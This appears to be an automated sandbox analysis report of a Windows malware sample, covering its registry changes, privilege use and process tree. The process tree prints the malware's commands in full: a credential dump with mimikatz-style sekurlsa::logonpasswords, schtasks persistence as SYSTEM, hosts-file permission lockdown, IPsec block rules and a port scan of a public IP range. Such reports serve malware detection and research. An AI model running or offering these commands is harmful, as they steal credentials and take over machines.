\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language iacqttm.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language evlwailif.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 2365ffb87d643fcdca1434bb291c2ef0cf54b3e6b4313788140edb0515df06f8N.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language iacqttm.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wpcap.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language PING.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language xohudmc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language dbqlbfrvt.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs
Adversaries may check for Internet connectivity on compromised systems.
Processes:
cmd.exePING.EXEpid Process 840 cmd.exe 1588 PING.EXE -
NSIS installer 3 IoCs
Processes:
resource yara_rule behavioral2/files/0x00080000000234db-6.dat nsis_installer_2 behavioral2/files/0x000200000001e44c-15.dat nsis_installer_1 behavioral2/files/0x000200000001e44c-15.dat nsis_installer_2 -
Modifies data under HKEY_USERS 45 IoCs
Processes:
iacqttm.exestiattrir.exestiattrir.exestiattrir.exestiattrir.exestiattrir.exestiattrir.exestiattrir.exestiattrir.exestiattrir.exestiattrir.exestiattrir.exestiattrir.exestiattrir.exestiattrir.exestiattrir.exestiattrir.exestiattrir.exestiattrir.exedescription ioc Process Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" iacqttm.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" stiattrir.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" stiattrir.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" stiattrir.exe Key created \REGISTRY\USER\.DEFAULT\Software stiattrir.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump stiattrir.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" stiattrir.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump stiattrir.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" stiattrir.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" stiattrir.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" iacqttm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump stiattrir.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump stiattrir.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump stiattrir.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump stiattrir.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump stiattrir.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump stiattrir.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" iacqttm.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" stiattrir.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump stiattrir.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" stiattrir.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing stiattrir.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump stiattrir.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing iacqttm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ iacqttm.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" iacqttm.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" stiattrir.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" stiattrir.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump stiattrir.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" stiattrir.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" stiattrir.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" stiattrir.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump stiattrir.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" stiattrir.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" stiattrir.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals stiattrir.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump stiattrir.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" stiattrir.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" stiattrir.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" stiattrir.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump stiattrir.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump stiattrir.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump stiattrir.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump stiattrir.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump stiattrir.exe -
Modifies registry class 14 IoCs
Processes:
iacqttm.exedescription ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.ps1\ iacqttm.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.VBE\ = "txtfile" iacqttm.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.reg\ iacqttm.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.js\ iacqttm.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.js\ = "txtfile" iacqttm.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.vbs\ iacqttm.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.vbs\ = "txtfile" iacqttm.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.vbe\ iacqttm.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.reg\ = "txtfile" iacqttm.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.cmd\ iacqttm.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.cmd\ = "txtfile" iacqttm.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.ps1\ = "txtfile" iacqttm.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.bat\ iacqttm.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.bat\ = "txtfile" iacqttm.exe -
Runs net.exe
-
Runs ping.exe 1 TTPs 1 IoCs
-
Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exeschtasks.exepid Process 2352 schtasks.exe 1536 schtasks.exe 836 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
iacqttm.exepid Process 3976 iacqttm.exe 3976 iacqttm.exe 3976 iacqttm.exe 3976 iacqttm.exe 3976 iacqttm.exe 3976 iacqttm.exe 3976 iacqttm.exe 3976 iacqttm.exe 3976 iacqttm.exe 3976 iacqttm.exe 3976 iacqttm.exe 3976 iacqttm.exe 3976 iacqttm.exe 3976 iacqttm.exe 3976 iacqttm.exe 3976 iacqttm.exe 3976 iacqttm.exe 3976 iacqttm.exe 3976 iacqttm.exe 3976 iacqttm.exe 3976 iacqttm.exe 3976 iacqttm.exe 3976 iacqttm.exe 3976 iacqttm.exe 3976 iacqttm.exe 3976 iacqttm.exe 3976 iacqttm.exe 3976 iacqttm.exe 3976 iacqttm.exe 3976 iacqttm.exe 3976 iacqttm.exe 3976 iacqttm.exe 3976 iacqttm.exe 3976 iacqttm.exe 3976 iacqttm.exe 3976 iacqttm.exe 3976 iacqttm.exe 3976 iacqttm.exe 3976 iacqttm.exe 3976 iacqttm.exe 3976 iacqttm.exe 3976 iacqttm.exe 3976 iacqttm.exe 3976 iacqttm.exe 3976 iacqttm.exe 3976 iacqttm.exe 3976 iacqttm.exe 3976 iacqttm.exe 3976 iacqttm.exe 3976 iacqttm.exe 3976 iacqttm.exe 3976 iacqttm.exe 3976 iacqttm.exe 3976 iacqttm.exe 3976 iacqttm.exe 3976 iacqttm.exe 3976 iacqttm.exe 3976 iacqttm.exe 3976 iacqttm.exe 3976 iacqttm.exe 3976 iacqttm.exe 3976 iacqttm.exe 3976 iacqttm.exe 3976 iacqttm.exe -
Suspicious behavior: LoadsDriver 15 IoCs
Processes:
pid Process 660 660 660 660 660 660 660 660 660 660 660 660 660 660 660 -
Suspicious behavior: RenamesItself 1 IoCs
Processes:
2365ffb87d643fcdca1434bb291c2ef0cf54b3e6b4313788140edb0515df06f8N.exepid Process 5100 2365ffb87d643fcdca1434bb291c2ef0cf54b3e6b4313788140edb0515df06f8N.exe -
Suspicious use of AdjustPrivilegeToken 24 IoCs
Processes:
2365ffb87d643fcdca1434bb291c2ef0cf54b3e6b4313788140edb0515df06f8N.exeiacqttm.exeiacqttm.exevfshost.exestiattrir.exerqwpbp.exestiattrir.exestiattrir.exestiattrir.exestiattrir.exestiattrir.exestiattrir.exestiattrir.exestiattrir.exestiattrir.exestiattrir.exestiattrir.exestiattrir.exestiattrir.exestiattrir.exestiattrir.exestiattrir.exestiattrir.exedescription pid Process Token: SeDebugPrivilege 5100 2365ffb87d643fcdca1434bb291c2ef0cf54b3e6b4313788140edb0515df06f8N.exe Token: SeDebugPrivilege 3116 iacqttm.exe Token: SeDebugPrivilege 3976 iacqttm.exe Token: SeDebugPrivilege 316 vfshost.exe Token: SeDebugPrivilege 1940 stiattrir.exe Token: SeLockMemoryPrivilege 920 rqwpbp.exe Token: SeLockMemoryPrivilege 920 rqwpbp.exe Token: SeDebugPrivilege 4004 stiattrir.exe Token: SeDebugPrivilege 3688 stiattrir.exe Token: SeDebugPrivilege 3332 stiattrir.exe Token: SeDebugPrivilege 1968 stiattrir.exe Token: SeDebugPrivilege 3548 stiattrir.exe Token: SeDebugPrivilege 4076 stiattrir.exe Token: SeDebugPrivilege 1608 stiattrir.exe Token: SeDebugPrivilege 4576 stiattrir.exe Token: SeDebugPrivilege 5064 stiattrir.exe Token: SeDebugPrivilege 2452 stiattrir.exe Token: SeDebugPrivilege 1852 stiattrir.exe Token: SeDebugPrivilege 4292 stiattrir.exe Token: SeDebugPrivilege 1488 stiattrir.exe Token: SeDebugPrivilege 868 stiattrir.exe Token: SeDebugPrivilege 1340 stiattrir.exe Token: SeDebugPrivilege 4656 stiattrir.exe Token: SeDebugPrivilege 3624 stiattrir.exe -
Suspicious use of SetWindowsHookEx 10 IoCs
Processes:
2365ffb87d643fcdca1434bb291c2ef0cf54b3e6b4313788140edb0515df06f8N.exeiacqttm.exeiacqttm.exexohudmc.exexcllcg.exeiacqttm.exepid Process 5100 2365ffb87d643fcdca1434bb291c2ef0cf54b3e6b4313788140edb0515df06f8N.exe 5100 2365ffb87d643fcdca1434bb291c2ef0cf54b3e6b4313788140edb0515df06f8N.exe 3116 iacqttm.exe 3116 iacqttm.exe 3976 iacqttm.exe 3976 iacqttm.exe 2812 xohudmc.exe 4536 xcllcg.exe 4652 iacqttm.exe 4652 iacqttm.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
2365ffb87d643fcdca1434bb291c2ef0cf54b3e6b4313788140edb0515df06f8N.execmd.exeiacqttm.execmd.execmd.exewpcap.exenet.exenet.exenet.exedescription pid Process procid_target PID 5100 wrote to memory of 840 5100 2365ffb87d643fcdca1434bb291c2ef0cf54b3e6b4313788140edb0515df06f8N.exe 84 PID 5100 wrote to memory of 840 5100 2365ffb87d643fcdca1434bb291c2ef0cf54b3e6b4313788140edb0515df06f8N.exe 84 PID 5100 wrote to memory of 840 5100 2365ffb87d643fcdca1434bb291c2ef0cf54b3e6b4313788140edb0515df06f8N.exe 84 PID 840 wrote to memory of 1588 840 cmd.exe 86 PID 840 wrote to memory of 1588 840 cmd.exe 86 PID 840 wrote to memory of 1588 840 cmd.exe 86 PID 840 wrote to memory of 3116 840 cmd.exe 87 PID 840 wrote to memory of 3116 840 cmd.exe 87 PID 840 wrote to memory of 3116 840 cmd.exe 87 PID 3976 wrote to memory of 1076 3976 iacqttm.exe 89 PID 3976 wrote to memory of 1076 3976 iacqttm.exe 89 PID 3976 wrote to memory of 1076 3976 iacqttm.exe 89 PID 1076 wrote to memory of 3080 1076 cmd.exe 91 PID 1076 wrote to memory of 3080 1076 cmd.exe 91 PID 1076 wrote to memory of 3080 1076 cmd.exe 91 PID 1076 wrote to memory of 2084 1076 cmd.exe 92 PID 1076 wrote to memory of 2084 1076 cmd.exe 92 PID 1076 wrote to memory of 2084 1076 cmd.exe 92 PID 1076 wrote to memory of 4172 1076 cmd.exe 93 PID 1076 wrote to memory of 4172 1076 cmd.exe 93 PID 1076 wrote to memory of 4172 1076 cmd.exe 93 PID 1076 wrote to memory of 3540 1076 cmd.exe 94 PID 1076 wrote to memory of 3540 1076 cmd.exe 94 PID 1076 wrote to memory of 3540 1076 cmd.exe 94 PID 1076 wrote to memory of 2316 1076 cmd.exe 95 PID 1076 wrote to memory of 2316 1076 cmd.exe 95 PID 1076 wrote to memory of 2316 1076 cmd.exe 95 PID 1076 wrote to memory of 2800 1076 cmd.exe 96 PID 1076 wrote to memory of 2800 1076 cmd.exe 96 PID 1076 wrote to memory of 2800 1076 cmd.exe 96 PID 3976 wrote to memory of 3288 3976 iacqttm.exe 104 PID 3976 wrote to memory of 3288 3976 iacqttm.exe 104 PID 3976 wrote to memory of 3288 3976 iacqttm.exe 104 PID 3976 wrote to memory of 412 3976 iacqttm.exe 106 PID 3976 wrote to memory of 412 3976 iacqttm.exe 106 PID 3976 wrote to memory of 412 3976 iacqttm.exe 106 PID 3976 wrote to memory of 3920 3976 iacqttm.exe 108 PID 3976 wrote to memory of 3920 3976 iacqttm.exe 108 PID 3976 wrote to memory of 3920 3976 iacqttm.exe 108 PID 3976 wrote to memory of 3388 3976 iacqttm.exe 112 PID 3976 wrote to memory of 3388 3976 iacqttm.exe 112 PID 3976 wrote to memory of 3388 3976 iacqttm.exe 112 PID 3388 wrote to memory of 2244 3388 cmd.exe 114 PID 3388 wrote to memory of 2244 3388 cmd.exe 114 PID 3388 wrote to memory of 2244 3388 cmd.exe 114 PID 2244 wrote to memory of 2080 2244 wpcap.exe 115 PID 2244 wrote to memory of 2080 2244 wpcap.exe 115 PID 2244 wrote to memory of 2080 2244 wpcap.exe 115 PID 2080 wrote to memory of 1584 2080 net.exe 117 PID 2080 wrote to memory of 1584 2080 net.exe 117 PID 2080 wrote to memory of 1584 2080 net.exe 117 PID 2244 wrote to memory of 2400 2244 wpcap.exe 118 PID 2244 wrote to memory of 2400 2244 wpcap.exe 118 PID 2244 wrote to memory of 2400 2244 wpcap.exe 118 PID 2400 wrote to memory of 3068 2400 net.exe 120 PID 2400 wrote to memory of 3068 2400 net.exe 120 PID 2400 wrote to memory of 3068 2400 net.exe 120 PID 2244 wrote to memory of 2152 2244 wpcap.exe 121 PID 2244 wrote to memory of 2152 2244 wpcap.exe 121 PID 2244 wrote to memory of 2152 2244 wpcap.exe 121 PID 2152 wrote to memory of 620 2152 net.exe 123 PID 2152 wrote to memory of 620 2152 net.exe 123 PID 2152 wrote to memory of 620 2152 net.exe 123 PID 2244 wrote to memory of 1604 2244 wpcap.exe 124
Processes
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵PID:2132
-
C:\Windows\TEMP\beegewark\rqwpbp.exe"C:\Windows\TEMP\beegewark\rqwpbp.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:920
-
-
C:\Users\Admin\AppData\Local\Temp\2365ffb87d643fcdca1434bb291c2ef0cf54b3e6b4313788140edb0515df06f8N.exe"C:\Users\Admin\AppData\Local\Temp\2365ffb87d643fcdca1434bb291c2ef0cf54b3e6b4313788140edb0515df06f8N.exe"1⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: RenamesItself
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:5100 -
C:\Windows\SysWOW64\cmd.execmd /c ping 127.0.0.1 -n 5 & Start C:\Windows\ctnikqfc\iacqttm.exe2⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Suspicious use of WriteProcessMemory
PID:840 -
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 53⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:1588
-
-
C:\Windows\ctnikqfc\iacqttm.exeC:\Windows\ctnikqfc\iacqttm.exe3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:3116
-
-
-
C:\Windows\ctnikqfc\iacqttm.exeC:\Windows\ctnikqfc\iacqttm.exe1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Event Triggered Execution: Image File Execution Options Injection
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3976 -
C:\Windows\SysWOW64\cmd.execmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1076 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:3080
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D users3⤵
- System Location Discovery: System Language Discovery
PID:2084
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:4172
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D administrators3⤵
- System Location Discovery: System Language Discovery
PID:3540
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:2316
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM3⤵
- System Location Discovery: System Language Discovery
PID:2800
-
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static del all2⤵
- Event Triggered Execution: Netsh Helper DLL
PID:3288
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add policy name=Bastards description=FuckingBastards2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:412
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filteraction name=BastardsList action=block2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:3920
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\baerflpsi\ngfqdelbf\wpcap.exe /S2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3388 -
C:\Windows\baerflpsi\ngfqdelbf\wpcap.exeC:\Windows\baerflpsi\ngfqdelbf\wpcap.exe /S3⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2244 -
C:\Windows\SysWOW64\net.exenet stop "Boundary Meter"4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2080 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "Boundary Meter"5⤵
- System Location Discovery: System Language Discovery
PID:1584
-
-
-
C:\Windows\SysWOW64\net.exenet stop "TrueSight Meter"4⤵
- Suspicious use of WriteProcessMemory
PID:2400 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "TrueSight Meter"5⤵
- System Location Discovery: System Language Discovery
PID:3068
-
-
-
C:\Windows\SysWOW64\net.exenet stop npf4⤵
- Suspicious use of WriteProcessMemory
PID:2152 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop npf5⤵
- System Location Discovery: System Language Discovery
PID:620
-
-
-
C:\Windows\SysWOW64\net.exenet start npf4⤵
- System Location Discovery: System Language Discovery
PID:1604 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf5⤵PID:4472
-
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net start npf2⤵
- System Location Discovery: System Language Discovery
PID:624 -
C:\Windows\SysWOW64\net.exenet start npf3⤵
- System Location Discovery: System Language Discovery
PID:4976 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf4⤵
- System Location Discovery: System Language Discovery
PID:5096
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net start npf2⤵
- System Location Discovery: System Language Discovery
PID:2756 -
C:\Windows\SysWOW64\net.exenet start npf3⤵
- System Location Discovery: System Language Discovery
PID:4560 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf4⤵
- System Location Discovery: System Language Discovery
PID:2552
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\baerflpsi\ngfqdelbf\evlwailif.exe -p 80 222.186.128.1-222.186.255.255 --rate=512 -oJ C:\Windows\baerflpsi\ngfqdelbf\Scant.txt2⤵
- System Location Discovery: System Language Discovery
PID:3084 -
C:\Windows\baerflpsi\ngfqdelbf\evlwailif.exeC:\Windows\baerflpsi\ngfqdelbf\evlwailif.exe -p 80 222.186.128.1-222.186.255.255 --rate=512 -oJ C:\Windows\baerflpsi\ngfqdelbf\Scant.txt3⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:4344
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\baerflpsi\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit >> C:\Windows\baerflpsi\Corporate\log.txt2⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
PID:5076 -
C:\Windows\baerflpsi\Corporate\vfshost.exeC:\Windows\baerflpsi\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:316
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "tmngtibdz" /ru system /tr "cmd /c C:\Windows\ime\iacqttm.exe"2⤵PID:4896
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:4900
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "tmngtibdz" /ru system /tr "cmd /c C:\Windows\ime\iacqttm.exe"3⤵
- Scheduled Task/Job: Scheduled Task
PID:1536
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "agrlckqtl" /ru system /tr "cmd /c echo Y|cacls C:\Windows\ctnikqfc\iacqttm.exe /p everyone:F"2⤵
- System Location Discovery: System Language Discovery
PID:4912 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:1940
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "agrlckqtl" /ru system /tr "cmd /c echo Y|cacls C:\Windows\ctnikqfc\iacqttm.exe /p everyone:F"3⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:2352
-
-
-
